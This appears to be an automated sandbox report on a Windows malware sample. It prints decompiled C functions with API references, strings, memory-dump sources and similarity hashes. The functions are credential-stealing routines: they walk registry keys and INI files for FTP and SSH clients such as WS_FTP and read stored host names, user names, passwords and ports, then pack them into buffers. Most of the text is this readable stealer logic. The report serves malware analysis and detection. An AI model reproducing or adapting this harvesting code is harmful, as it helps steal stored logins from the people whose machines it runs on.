						_v2072 = E00401D71(_a8, _v2068, "Url", 0);
						_v2076 = E00401D71(_a8, _v2068, "UserName", 0);
						_v2088 = E00401D71(_a8, _v2068, "RootDirectory", 0);
						_v2092 = E00401D71(_a8, _v2068, "Port", 0);
						_v2096 = E00401D71(_a8, _v2068, "ServerType", 0);
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E004015CB(E004015CB(E00401569(_a4, 0xbeef0010), _a4, _v2072), _a4, _v2076);
							E004015CB(E004015CB(E004015CB(E0040159F(_a4, _v2080, _v2084), _a4, _v2092), _a4, _v2088), _a4, _v2096);
						}
						E004018B8(_v2080);
						E004018B8(_v2072);
						E004018B8(_v2076);
						E004018B8(_v2088);
						E004018B8(_v2092);
						E004018B8(_v2096);
						E00407F0C(_a4, _a8, _v2068);
						E004018B8(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t64;
			}

0x00407f1f
0x00407f24
0x00407f26
0x00407f2c
0x00407f33
0x00407f33
0x00407f53
0x00407f58
0x00407f5a
0x00000000
0x00000000
0x00407f7e
0x00407f84
0x00407fa3
0x00407fbe
0x00407fd9
0x00407ff4
0x0040800f
0x0040802a
0x00408037
0x0040806f
0x004080ad
0x004080ad
0x004080b8
0x004080c3
0x004080ce
0x004080d9
0x004080e4
0x004080ef
0x00408100
0x0040810b
0x00408110
0x00408110
0x00000000
0x0040811b
0x00408121

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407F1F
RegEnumKeyExA.ADVAPI32 ref: 00407F53
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040811B

Strings

RootDirectory, xrefs: 00407FE1
Url, xrefs: 00407FAB
Port, xrefs: 00407FFC
UserName, xrefs: 00407FC6
ServerType, xrefs: 00408017
PassWord, xrefs: 00407F90

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
API String ID: 1332880857-2128033141
Opcode ID: 22de75e03f9af4332dab08cffb5910af10b9bff4ca3bcc8331372a063a0d53dd
Instruction ID: 5ab7ce4d41d7449111e2bf0245fe8bdc2d5e3158fb84ab1408711ceaad0d48f8
Opcode Fuzzy Hash: 22de75e03f9af4332dab08cffb5910af10b9bff4ca3bcc8331372a063a0d53dd
Instruction Fuzzy Hash: C4519431840118BADF226F51CD42FED7AB9BF04344F14C5BAB558740B1DB7A5B91AF88

Uniqueness

Uniqueness Score: -1.00%

Function 004026DD, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84
registryfileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E004026DD(char* _a4, char* _a8, int _a12) {
				void* _v8;
				void* _v12;
				char _v273;
				CHAR* _v280;
				long _t24;
				long _t29;
				void* _t36;
				long _t44;
				void* _t47;
				void* _t48;

				_t47 = 0;
				_t24 = RegCreateKeyA( *0x414869, "Software\\WinRAR",  &_v8); // executed
				if(_t24 == 0) {
					_t44 = RegSetValueExA(_v8, _a4, 0, 3, _a8, _a12); // executed
					if(_t44 == 0) {
						_t47 = 1;
					}
					RegCloseKey(_v8); // executed
				}
				_t48 = _t47;
				if(_t48 == 0) {
					_t29 = GetTempPathA(0x104,  &_v273);
					if(_t29 != 0 && _t29 <= 0x104) {
						CreateDirectoryA( &_v273, 0);
						if(E004025A9( &_v273) != 0) {
							_t36 = E00401DF8( &_v273,  &_v273, _a4);
						} else {
							_t36 = E00401E4C(E00401DF8( &_v273,  &_v273, "\\"), _t43, _a4);
						}
						_v280 = _t36;
						_push(0);
						_push(0);
						_push(2);
						_push(0);
						_push(3);
						_push(0xc0000000);
						ExitProcess(_v280);
						_v12 = _t36;
						if(_t36 + 1 != 0) {
							_t48 = E00401422(_v12, _a8, _a12);
							CloseHandle(_v12);
						}
						_t48 = _t48;
						if(_t48 == 0) {
							DeleteFileA(_v280);
						}
						E004018B8(_v280);
					}
				}
				return _t48;
			}

0x004026e7
0x004026f8
0x004026ff
0x00402711
0x00402718
0x0040271a
0x0040271a
0x0040271e
0x0040271e
0x00402723
0x00402725
0x0040273c
0x0040273e
0x00402758
0x0040276b
0x00402793
0x0040276d
0x00402782
0x00402782
0x00402798
0x0040279e
0x004027a0
0x004027a2
0x004027a4
0x004027a6
0x004027a8
0x004027b3
0x004027b8
0x004027bc
0x004027cc
0x004027d1
0x004027d1
0x004027d6
0x004027d8
0x004027e0
0x004027e0
0x004027eb
0x004027eb
0x0040273e
0x004027f4

APIs

RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 004026F8
RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00402711
RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,?), ref: 0040271E
GetTempPathA.KERNEL32(00000104,?), ref: 00402737
CreateDirectoryA.KERNEL32(?,00000000,00000104,?), ref: 00402758
ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027B3
CloseHandle.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027D1
DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004027E0

Strings

Software\WinRAR, xrefs: 004026ED

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseCreate$DeleteDirectoryExitFileHandlePathProcessTempValue
String ID: Software\WinRAR
API String ID: 2428708885-224198155
Opcode ID: 9cbc2575f829246b827ea78dcd8dc99298e0788759a0ab8673f9bf8b561286c8
Instruction ID: 28b2972cc479343a501f6bdb5bbfbd3fa5c74dd95b9eafedc45f56a84fd52fee
Opcode Fuzzy Hash: 9cbc2575f829246b827ea78dcd8dc99298e0788759a0ab8673f9bf8b561286c8
Instruction Fuzzy Hash: 7621743194020DBBDF216FA0CD86FDD7A69AB14748F100076B214B61E1E6F99AD06B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040504B, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040504B(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				CHAR* _v276;
				int _t24;
				void* _t25;
				void* _t26;
				long _t37;
				long _t40;
				void* _t47;
				void* _t48;
				void* _t49;

				_t49 = __edi;
				_t48 = __ecx;
				_t47 = __ebx;
				_v8 = E004015F0(_a4, 3, 0);
				_t24 = GetWindowsDirectoryA( &_v269, 0x104);
				if(_t24 != 0 && _t24 <= 0x104) {
					_v276 = E00401DF8( &_v269,  &_v269, "\\win.ini");
					_t37 = GetPrivateProfileStringA("WS_FTP", "DIR", 0x414847,  &_v269, 0x104, _v276); // executed
					if(_t37 != 0) {
						E00404E73(_t48, _a4,  &_v269, 0);
					}
					_t40 = GetPrivateProfileStringA("WS_FTP", "DEFDIR", 0x414847,  &_v269, 0x104, _v276); // executed
					_t53 = _t40;
					if(_t40 != 0) {
						E00404E73(_t48, _a4,  &_v269, 0);
					}
					E004018B8(_v276);
				}
				_t25 = E00401EB1(_t53, 0x2b); // executed
				_t26 = _t25;
				_t54 = _t26;
				if(_t26 != 0) {
					E00404E73(_t48, _a4, E00401E4C(_t26, _t26, "\\Ipswitch\\WS_FTP"), 0); // executed
					E004018B8(_t31);
				}
				E00404FFF(_t48, _t54, _a4, 0x1a, "\\Ipswitch"); // executed
				E00404FFF(_t48, _t54, _a4, 0x23, "\\Ipswitch"); // executed
				E00404FFF(_t48, _t54, _a4, 0x1c, "\\Ipswitch"); // executed
				return E00401636(_t47, _t48, _t49, _t54, _a4, _v8);
			}

0x0040504b
0x0040504b
0x0040504b
0x00405060
0x00405074
0x00405076
0x00405098
0x004050bf
0x004050c6
0x004050d4
0x004050d4
0x004050fa
0x004050ff
0x00405101
0x0040510f
0x0040510f
0x0040511a
0x0040511a
0x00405121
0x00405126
0x00405126
0x00405128
0x0040513c
0x00405141
0x00405141
0x00405150
0x0040515f
0x0040516e
0x0040517f

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040506F

Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40

GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,00414847,?,00000104,?), ref: 004050BF
GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,00414847,?,00000104,?), ref: 004050FA

Strings

WS_FTP, xrefs: 004050BA, 004050F5
\Ipswitch, xrefs: 00405146, 00405155, 00405164
\win.ini, xrefs: 00405087
\Ipswitch\WS_FTP, xrefs: 0040512A
DIR, xrefs: 004050B5
DEFDIR, xrefs: 004050F0

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
API String ID: 2508676433-45949541
Opcode ID: b3e6310091d01b3e42474d4697e08130c510244b52e9dc1f677c885e0d8b0a8e
Instruction ID: 1ad5851406937463fc4fdd25d104d768d2af762f2f9e7c483ba0ad0795fe615e
Opcode Fuzzy Hash: b3e6310091d01b3e42474d4697e08130c510244b52e9dc1f677c885e0d8b0a8e
Instruction Fuzzy Hash: A8212671E80608BADB127A61CC43FDE3A299B54744F100077B758B51E3DBF99BD09A6C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9F9, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 83
registryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040E9F9(void* __eflags, void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				CHAR* _v2076;
				long _t33;
				long _t38;
				CHAR* _t48;
				long _t49;

				_v2076 = E004018CF(0x105);
				_t33 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				if(_t33 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t38 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t39 = _t38;
						if(_t38 != 0) {
							break;
						}
						_v2068 = E00401DF8( &_v2064, E00401DF8(_t39, _a8, "\\"),  &_v2064);
						E004018B8(_t40);
						_v2072 = E00401D71(_a4, _v2068, "Path", 0);
						__eflags = _v2072;
						if(__eflags != 0) {
							_t48 = E00401DF8(_t44, _v2072, "\\PocoSystem.ini");
							_push(_t48);
							_t49 = GetPrivateProfileStringA("Program", "DataPath", 0x414847, _v2076, 0x104, _t48);
							__eflags = _t49 - 3;
							if(_t49 > 3) {
								E00404351(_a12, _v2076, "accounts.ini", 0xbeef0000);
							}
							E004018B8();
						}
						E0040E9F9(__eflags, _a4, _v2068, _a12);
						E004018B8(_v2068);
						E004018B8(_v2072);
						_v12 = _v12 + 1;
					}
					RegCloseKey(_v8);
				}
				return E004018B8(_v2076);
			}

0x0040ea0c
0x0040ea1c
0x0040ea23
0x0040ea29
0x0040ea30
0x0040ea30
0x0040ea50
0x0040ea55
0x0040ea57
0x00000000
0x00000000
0x0040ea7b
0x0040ea81
0x0040ea9b
0x0040eaa1
0x0040eaa8
0x0040eab5
0x0040eaba
0x0040ead6
0x0040eadb
0x0040eade
0x0040eaf3
0x0040eaf3
0x0040eaf8
0x0040eaf8
0x0040eb09
0x0040eb14
0x0040eb1f
0x0040eb24
0x0040eb24
0x0040eb2f
0x0040eb2f
0x0040eb40

APIs

Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EA1C
RegEnumKeyExA.ADVAPI32 ref: 0040EA50
GetPrivateProfileStringA.KERNEL32(Program,DataPath,00414847,?,00000104,00000000), ref: 0040EAD6
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EB2F

Strings

accounts.ini, xrefs: 0040EAE5
Path, xrefs: 0040EA88
DataPath, xrefs: 0040EACC
Program, xrefs: 0040EAD1
\PocoSystem.ini, xrefs: 0040EAAA

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocCloseEnumLocalOpenPrivateProfileString
String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
API String ID: 1343824468-2495907966
Opcode ID: ffbd8a854c3910af73e1b38a16e95bdd0ba29be6571c0ad4e37981ba44995c13
Instruction ID: ac58ce0af485c97c10e38b57228944f3f3edc0c01af0d6674f8eb1bd57798e51
Opcode Fuzzy Hash: ffbd8a854c3910af73e1b38a16e95bdd0ba29be6571c0ad4e37981ba44995c13
Instruction Fuzzy Hash: F1314A31940118BADF11BB91CC42FDD7ABAFF04704F10C4BAB554710E1DAB99AA1AF98

Uniqueness

Uniqueness Score: -1.00%

Function 004063FD, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 140
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063FD(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				intOrPtr* _v2092;
				char _v2096;
				char _v2100;
				long _t57;
				long _t58;
				long _t61;
				intOrPtr* _t72;

				_t57 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
				_t58 = _t57;
				if(_t58 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t61 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t62 = _t61;
						if(_t61 != 0) {
							break;
						}
						_v2068 = E00401E4C( &_v2064, E00401DF8(_t62, _a8, "\\"),  &_v2064);
						_v2080 = E00401D71( *0x414869, _v2068, "PW", 0);
						_v2072 = E00401D71( *0x414869, _v2068, "Host", 0);
						_v2076 = E00401D71( *0x414869, _v2068, "User", 0);
						_v2084 = E00401D71( *0x414869, _v2068, "PthR", 0);
						_t72 = E00401D71( *0x414869, _v2068, "Port",  &_v2096);
						if(_t72 == 0 || _v2096 != 4) {
							_t73 = _t72;
							if(_t72 != 0) {
								E004018B8(_t73);
							}
							_v2088 = 0x15;
						} else {
							 *_t23 =  *_t72;
							E004018B8(_t72);
						}
						_v2092 = E00401D71( *0x414869, _v2068, "SSH",  &_v2100);
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0010), _a4, _v2072), _a4, _v2076), _a4, _v2080);
							E004015CB(E00401569(_a4, _v2088), _a4, _v2084);
							if(_v2092 == 0 || _v2100 != 4) {
								E00401569(_a4, 0);
							} else {
								E00401569(_a4,  *_v2092);
							}
						}
						E004018B8(_v2080);
						E004018B8(_v2072);
						E004018B8(_v2076);
						E004018B8(_v2084);
						E004018B8(_v2092);
						E004018B8(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t58;
			}

0x00406413
0x00406418
0x0040641a
0x00406420
0x00406427
0x00406427
0x00406447
0x0040644c
0x0040644e
0x00000000
0x00000000
0x00406471
0x0040648f
0x004064ad
0x004064cb
0x004064e9
0x0040650c
0x0040650e
0x00406529
0x0040652b
0x0040652e
0x0040652e
0x00406533
0x00406519
0x0040651b
0x00406522
0x00406522
0x0040655a
0x00406567
0x004065b9
0x004065d5
0x004065e1
0x00406603
0x004065ec
0x004065f7
0x004065f7
0x004065e1
0x0040660e
0x00406619
0x00406624
0x0040662f
0x0040663a
0x00406645
0x0040664a
0x0040664a
0x00000000
0x00406655
0x0040665b

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00406413
RegEnumKeyExA.ADVAPI32 ref: 00406447
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406655

Strings

PthR, xrefs: 004064D3
Port, xrefs: 004064F6
SSH, xrefs: 00406544
Host, xrefs: 00406497
User, xrefs: 004064B5

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Port$PthR$SSH$User
API String ID: 1332880857-1643752846
Opcode ID: deb2347e482cfc6ac4c13a4373beb61988f4ed264ac067ee08bdaaf07eff2da2
Instruction ID: 7c2f2a94b444b1cf8be7c0a3922bf6908aa52d237082ff0e2c71ec8c1971a0d3
Opcode Fuzzy Hash: deb2347e482cfc6ac4c13a4373beb61988f4ed264ac067ee08bdaaf07eff2da2
Instruction Fuzzy Hash: 5751E43194011CFADF22AB51CC42BED7AB9BF44304F10C5BAB549750F1CB7A5AA1AF88

Uniqueness

Uniqueness Score: -1.00%

Function 00405F4C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 121
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F4C(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				char _v2092;
				long _t48;
				long _t49;
				long _t52;
				intOrPtr* _t64;

				_t48 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
				_t49 = _t48;
				if(_t49 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t52 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t53 = _t52;
						if(_t52 != 0) {
							break;
						}
						_v2068 = E00401DF8( &_v2064, E00401DF8(_t53, _a8, "\\"),  &_v2064);
						E004018B8(_t54);
						_v2080 = E00401D71( *0x414869, _v2068, "Password", 0);
						_v2072 = E00401D71( *0x414869, _v2068, "HostAdrs", 0);
						_v2076 = E00401D71( *0x414869, _v2068, "UserName", 0);
						_v2084 = E00401D71( *0x414869, _v2068, "RemoteDir", 0);
						_t64 = E00401D71( *0x414869, _v2068, "Port",  &_v2092);
						if(_t64 == 0 || _v2092 != 4) {
							_t65 = _t64;
							if(_t64 != 0) {
								E004018B8(_t65);
							}
							_v2088 = 0x15;
						} else {
							 *_t23 =  *_t64;
							E004018B8(_t64);
						}
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E004015CB(E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v2072), _a4, _v2076), _a4, _v2080), _a4, _v2084);
							E00401569(_a4, _v2088);
						}
						E004018B8(_v2080);
						E004018B8(_v2072);
						E004018B8(_v2076);
						E004018B8(_v2084);
						E004018B8(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t49;
			}

0x00405f62
0x00405f67
0x00405f69
0x00405f6f
0x00405f76
0x00405f76
0x00405f96
0x00405f9b
0x00405f9d
0x00000000
0x00000000
0x00405fc1
0x00405fc7
0x00405fe4
0x00406002
0x00406020
0x0040603e
0x00406061
0x00406063
0x0040607e
0x00406080
0x00406083
0x00406083
0x00406088
0x0040606e
0x00406070
0x00406077
0x00406077
0x00406099
0x004060ed
0x004060fb
0x004060fb
0x00406106
0x00406111
0x0040611c
0x00406127
0x00406132
0x00406137
0x00406137
0x00000000
0x00406142
0x00406148

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00405F62
RegEnumKeyExA.ADVAPI32 ref: 00405F96
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406142

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Strings

HostAdrs, xrefs: 00405FEC
Port, xrefs: 0040604B
RemoteDir, xrefs: 00406028
Password, xrefs: 00405FCE
UserName, xrefs: 0040600A

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: HostAdrs$Password$Port$RemoteDir$UserName
API String ID: 3369285772-3748300950
Opcode ID: c219dffec34b9dac28dc5d71a2502feea79d2819afc824340b3d4f055c4d4771
Instruction ID: 2d9a8220eb6bbd75a2f462893fd11e2b037df868adfd8f9c06f9ac5482d37282
Opcode Fuzzy Hash: c219dffec34b9dac28dc5d71a2502feea79d2819afc824340b3d4f055c4d4771
Instruction Fuzzy Hash: 0841053194011CEADF216B61CC42FDD7AB9BF44304F10C5BAB545780F1CB7A5AA1AF88

Uniqueness

Uniqueness Score: -1.00%

Function 0040717C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040717C(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				long _t56;
				long _t57;
				long _t60;

				_t56 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t57 = _t56;
				if(_t57 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t60 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t61 = _t60;
						if(_t60 != 0) {
							break;
						}
						_v2068 = E00401DF8( &_v2064, E00401DF8(_t61, _a12, "\\"),  &_v2064);
						E004018B8(_t62);
						_v2080 = E00401D71(_a8, _v2068, "Password", 0);
						_v2084 = E00401D71(_a8, _v2068, "_Password", 0);
						_v2072 = E00401D71(_a8, _v2068, "Server", 0);
						_v2076 = E00401D71(_a8, _v2068, "UserName", 0);
						_v2088 = E00401D71(_a8, _v2068, "Directory", 0);
						if(_v2080 != 0 || _v2084 != 0) {
							if(_v2072 != 0 && _v2076 != 0) {
								E004015CB(E004015CB(E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v2072), _a4, _v2076), _a4, _v2080), _a4, _v2084), _a4, _v2088);
							}
						}
						E004018B8(_v2080);
						E004018B8(_v2084);
						E004018B8(_v2072);
						E004018B8(_v2076);
						E004018B8(_v2088);
						E0040717C(_a4, _a8, _v2068);
						E004018B8(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t57;
			}

0x0040718f
0x00407194
0x00407196
0x0040719c
0x004071a3
0x004071a3
0x004071c3
0x004071c8
0x004071ca
0x00000000
0x00000000
0x004071ee
0x004071f4
0x0040720e
0x00407229
0x00407244
0x0040725f
0x0040727a
0x00407287
0x00407299
0x004072f2
0x004072f2
0x00407299
0x004072fd
0x00407308
0x00407313
0x0040731e
0x00407329
0x0040733a
0x00407345
0x0040734a
0x0040734a
0x00000000
0x00407355
0x0040735b

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040718F
RegEnumKeyExA.ADVAPI32 ref: 004071C3
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407355

Strings

Server, xrefs: 00407231
_Password, xrefs: 00407216
UserName, xrefs: 0040724C
Password, xrefs: 004071FB
Directory, xrefs: 00407267

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Directory$Password$Server$UserName$_Password
API String ID: 1332880857-3317168126
Opcode ID: ef5c1110db26fa909224c7a07f4a048dc71dc14832a81852d21dd845414aab36
Instruction ID: 54a0982324a7ff5f3bc78d2f041cd7ab304232967b033089dd6db8ff381706e5
Opcode Fuzzy Hash: ef5c1110db26fa909224c7a07f4a048dc71dc14832a81852d21dd845414aab36
Instruction Fuzzy Hash: 3B41D33184011CBADF226F51CC42BDDBABABF04344F14C1BAB958741B1DB7A5B91AF89

Uniqueness

Uniqueness Score: -1.00%

Function 0040D9FA, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D9FA(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				char _v2088;
				char* _v2092;
				long _t57;
				long _t58;
				long _t61;

				_t57 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				_t58 = _t57;
				if(_t58 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t61 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t62 = _t61;
						if(_t61 != 0) {
							break;
						}
						_v2092 = E00401DF8( &_v2064, E00401DF8(_t62, _a8, "\\"),  &_v2064);
						E004018B8(_t63);
						_v2068 = E00401D71(_a4, _v2092, "HostName", 0);
						_v2072 = E00401D71(_a4, _v2092, "UserName", 0);
						_v2076 = E00401D71(_a4, _v2092, "Password", 0);
						_v2080 = E00401D71(_a4, _v2092, "PortNumber",  &_v2088);
						_v2084 = E00401D71(_a4, _v2092, "TerminalType", 0);
						if(_v2068 != 0 && _v2072 != 0 && _v2076 != 0) {
							E004015CB(E004015CB(E004015CB(E00401569(_a12, 0xbeef0000), _a12, _v2068), _a12, _v2072), _a12, _v2076);
							E004015CB(E0040159F(_a12, _v2080, _v2088), _a12, _v2084);
						}
						E0040D9FA(_a4, _v2092, _a12);
						E004018B8(_v2092);
						E004018B8(_v2068);
						E004018B8(_v2072);
						E004018B8(_v2076);
						E004018B8(_v2080);
						E004018B8(_v2084);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t58;
			}

0x0040da0d
0x0040da12
0x0040da14
0x0040da1a
0x0040da21
0x0040da21
0x0040da41
0x0040da46
0x0040da48
0x00000000
0x00000000
0x0040da6c
0x0040da72
0x0040da8c
0x0040daa7
0x0040dac2
0x0040dae2
0x0040dafd
0x0040db0a
0x0040db50
0x0040db72
0x0040db72
0x0040db83
0x0040db8e
0x0040db99
0x0040dba4
0x0040dbaf
0x0040dbba
0x0040dbc5
0x0040dbca
0x0040dbca
0x00000000
0x0040dbd5
0x0040dbdb

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DA0D
RegEnumKeyExA.ADVAPI32 ref: 0040DA41
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DBD5

Strings

PortNumber, xrefs: 0040DACF
UserName, xrefs: 0040DA94
TerminalType, xrefs: 0040DAEA
Password, xrefs: 0040DAAF
HostName, xrefs: 0040DA79

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostName$Password$PortNumber$TerminalType$UserName
API String ID: 1332880857-1017491782
Opcode ID: 7d0ffad731660568f56f8f0a0490f44f83ea71fa47bb78a974b8c01c4dd83acf
